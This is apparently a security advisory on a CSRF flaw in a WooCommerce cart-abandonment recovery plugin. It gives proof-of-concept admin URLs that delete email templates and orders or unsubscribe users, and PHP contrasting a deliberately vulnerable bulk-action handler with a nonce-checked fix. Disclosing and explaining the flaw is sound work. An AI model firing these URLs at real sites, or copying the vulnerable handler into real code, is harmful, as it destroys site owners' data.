Description: The plugin does not perform a CSRF (nonce) check on its bulk actions. An attacker who can get a logged-in admin to follow a link can therefore make that admin delete arbitrary email templates, and delete or unsubscribe users from abandoned orders, via CSRF.
Proof of concept: make a logged-in admin open one of the URLs below. Each action is triggered by a plain GET request, so a link or an image tag on an attacker-controlled page is enough; `action2` mirrors `action` because the WP_List_Table bulk-action handler accepts the action from either the top or the bottom dropdown.
- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1
- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1
- To make them unsubscribe the user from the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1
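
The root cause is a bulk-action handler that checks the user's capability but never verifies a nonce, so any request the admin's browser sends is trusted. The following is an added illustration of that pattern and of the corrected handler; it is not the plugin's own code. The function names, the `wcar_bulk_action` nonce action and the `wcar_bulk_*` hooks are assumptions chosen for the example, and it expects to run inside a loaded WordPress (it uses only core APIs: `current_user_can`, `check_admin_referer`, `wp_nonce_url`, `wp_nonce_field`, `absint`, `sanitize_key`, `do_action`).

```php
<?php
// Added example, not code from the plugin. Assumed names: wcar_* functions,
// the 'wcar_bulk_action' nonce action, and the 'wcar_bulk_{action}' hooks.
// Must run inside WordPress (admin context).

/**
 * Resolve the requested bulk action. WP_List_Table reads it from either the
 * top ('action') or bottom ('action2') dropdown, which is why the PoC URLs
 * carry both; mirror that behaviour here. '-1' means "no action selected".
 */
function wcar_current_bulk_action() {
    foreach ( array( 'action', 'action2' ) as $key ) {
        if ( isset( $_REQUEST[ $key ] ) && '-1' !== $_REQUEST[ $key ] ) {
            return sanitize_key( wp_unslash( $_REQUEST[ $key ] ) );
        }
    }
    return '';
}

/** Normalise id / id[] into a list of positive integers. */
function wcar_requested_ids() {
    if ( ! isset( $_REQUEST['id'] ) ) {
        return array();
    }
    $ids = array_map( 'absint', (array) wp_unslash( $_REQUEST['id'] ) );
    return array_values( array_filter( $ids ) );
}

/**
 * VULNERABLE pattern (what the advisory describes): the capability check
 * proves the browser belongs to an admin, but nothing proves the admin
 * intended the request. A cross-site GET to admin.php?page=...&action=delete
 * &id=1 reaches the state change unchallenged.
 */
function wcar_handle_bulk_actions_vulnerable() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    $action = wcar_current_bulk_action();
    if ( '' === $action ) {
        return;
    }
    do_action( 'wcar_bulk_' . $action, wcar_requested_ids() ); // no nonce check
}

/**
 * FIXED pattern: verify a nonce tied to a specific action name before any
 * state change. check_admin_referer() calls wp_die() when the nonce is missing
 * or invalid, so execution never reaches the hooks on a forged request.
 * Always pass an explicit action string; the default (-1) nonce is the same
 * for every form and gives much weaker protection.
 */
function wcar_handle_bulk_actions_fixed() {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    $action = wcar_current_bulk_action();
    if ( '' === $action ) {
        return;
    }
    check_admin_referer( 'wcar_bulk_action', '_wpnonce' );

    $ids = wcar_requested_ids();
    if ( empty( $ids ) ) {
        return;
    }
    // Dispatch to the real delete/unsubscribe logic registered on these hooks
    // (assumed hook names); only reachable with a valid nonce.
    do_action( 'wcar_bulk_' . $action, $ids );
}

/**
 * The matching producer side: every link or form that triggers a bulk action
 * must carry the nonce the handler expects. Row-action links use
 * wp_nonce_url(); the bulk-action form uses wp_nonce_field().
 */
function wcar_action_link( $action, $id ) {
    $url = admin_url( 'admin.php?page=woo-cart-abandonment-recovery&action='
        . rawurlencode( $action ) . '&id=' . absint( $id ) );
    return wp_nonce_url( $url, 'wcar_bulk_action', '_wpnonce' );
}

function wcar_render_bulk_form_nonce() {
    // Echoes <input type="hidden" name="_wpnonce" value="..."> plus the referer field.
    wp_nonce_field( 'wcar_bulk_action', '_wpnonce' );
}
```

With the fixed handler in place, the three PoC URLs above fail at `check_admin_referer()` because they carry no `_wpnonce` parameter, and a forged one fails because nonces are bound to the logged-in user's session and the action string. Note that a nonce check is a complement to, not a replacement for, the capability check: keep both.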